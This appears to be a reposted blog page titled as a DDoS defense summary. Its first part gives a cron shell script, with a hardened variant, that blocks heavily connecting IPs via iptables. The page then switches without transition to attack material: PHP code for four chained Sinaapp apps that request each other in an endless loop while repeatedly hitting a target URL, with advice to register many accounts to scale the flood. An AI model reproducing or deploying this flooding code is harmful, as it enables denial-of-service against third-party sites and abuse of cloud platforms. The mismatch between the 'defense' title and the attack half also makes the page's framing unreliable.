Server DDoS Attack Defense script summary

Source: Internet
Author: User
Tags: iptables

A shell script for defending a server against DDoS attacks


1. Create the script

mkdir /root/bin

vi /root/bin/dropip.sh

#!/bin/bash
/bin/netstat -na | grep ESTABLISHED | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | sort -rn | head -10 | grep -v -E '192.168|127.0' | awk '{if ($2!=null && $1>4) {print $2}}' > /tmp/dropip
# Drop every address collected above and log the action
for i in $(cat /tmp/dropip)
do
    /sbin/iptables -A INPUT -s "$i" -j DROP
    echo "$i kill at `date`" >> /var/log/ddos
done

2. Grant execute permission

chmod +x /root/bin/dropip.sh

3. Add to scheduled task, execute once per minute

crontab -e

*/1 * * * * /root/bin/dropip.sh

Description

The most important part is the second line, which takes the top 10 IP addresses by number of established connections and writes them to the temporary file /tmp/dropip, excluding the internal IP segments 192.168 and 127.0. The for loop then drops every IP listed in /tmp/dropip with iptables and writes an entry to the log file /var/log/ddos.
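A hardened variant of the dropip.sh logic described above, as an added example that is not part of the original script: it anchors the private-range exclusions, accepts only well-formed IPv4 addresses, and checks for an existing rule before appending, so the per-minute cron run does not pile up duplicate DROP rules. The function names, the --apply switch, the LOG variable and the sample connections are assumptions made for illustration.

```bash
#!/bin/bash
# Added example: hardened take on the dropip.sh logic. Names and values are assumptions.
THRESHOLD=${THRESHOLD:-4}      # same cut-off as the script on the page ($1 > 4)
LOG=${LOG:-/var/log/ddos}

# Read `netstat -na` lines on stdin and print every remote IPv4 address holding more
# than THRESHOLD ESTABLISHED connections, skipping 127.0.0.0/8 and 192.168.0.0/16.
top_offenders() {
    awk -v max="$THRESHOLD" '
        $1 ~ /^tcp/ && $6 == "ESTABLISHED" {
            ip = $5
            sub(/:[0-9]+$/, "", ip)                               # drop the port
            if (ip !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) next    # IPv4 only; IPv6 peers are ignored
            if (ip ~ /^127\./ || ip ~ /^192\.168\./) next         # anchored, unlike grep -v "192.168|127.0"
            count[ip]++
        }
        END { for (ip in count) if (count[ip] > max) print ip }
    ' | LC_ALL=C sort
}

# Append a DROP rule only when an identical one is not already loaded, so the
# per-minute cron run does not grow the INPUT chain with duplicates.
block_ip() {
    local ip=$1
    /sbin/iptables -C INPUT -s "$ip" -j DROP 2>/dev/null && return 0
    /sbin/iptables -A INPUT -s "$ip" -j DROP &&
        echo "$ip blocked at $(date)" >> "$LOG"
}

# Constructed sample input (documentation and shared address ranges), not real traffic.
sample_netstat() {
    local n
    for n in 1 2 3 4 5; do
        echo "tcp 0 0 192.0.2.10:80 203.0.113.7:4000$n ESTABLISHED"
        echo "tcp 0 0 192.0.2.10:80 192.168.1.5:4100$n ESTABLISHED"
        echo "tcp 0 0 192.0.2.10:80 100.127.0.9:4200$n ESTABLISHED"
    done
    echo "tcp 0 0 192.0.2.10:80 198.51.100.9:43000 ESTABLISHED"
    echo "tcp 0 0 192.0.2.10:80 198.51.100.20:43001 TIME_WAIT"
    echo "tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN"
}

# Touch the firewall only when asked to: dropip.sh --apply (run as root from cron).
if [ "${1:-}" = "--apply" ]; then
    /bin/netstat -na | top_offenders | while read -r ip; do block_ip "$ip"; done
else
    sample_netstat | top_offenders   # dry run on the constructed sample
fi
```

In the sample, 100.127.0.9 is reported because the exclusion is anchored to the start of the address; the unanchored pattern '192.168|127.0' would have filtered it out since it contains "127.0".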

Another approach is to write the DDoS attack in PHP and run it from other cloud platforms.

Sinaapp was the main test object.

Test idea: Create 4 versions of the app.

Version 1 home page code:

<?php
file_get_contents('http://2.mars.sinaapp.com/'); // version 1 triggers the attack (accesses version 2)
?>

Version 2 home page code:

<?php
file_get_contents('http://www.xxx.com/ip.php'); // attack target
file_get_contents('http://3.mars.sinaapp.com/'); // access version 3
?>

Version 3 home page code:

<?php
for ($i = 1; $i <= 10; $i++) { // the malicious part: more iterations give a stronger effect
    file_get_contents('http://www.xxx.com/ip.php');
    file_get_contents('http://4.mars.sinaapp.com/');
}
?>

Version 4 home page code:

<?php
file_get_contents('http://2.mars.sinaapp.com/'); // access version 2, resulting in an endless loop
?>

These are the steps for the exploit with a single Sinaapp user; it can be extended by registering a large number of users and creating more versions to attack. In testing, however, each app actually had two IP exits, so it is better to use multiple users.
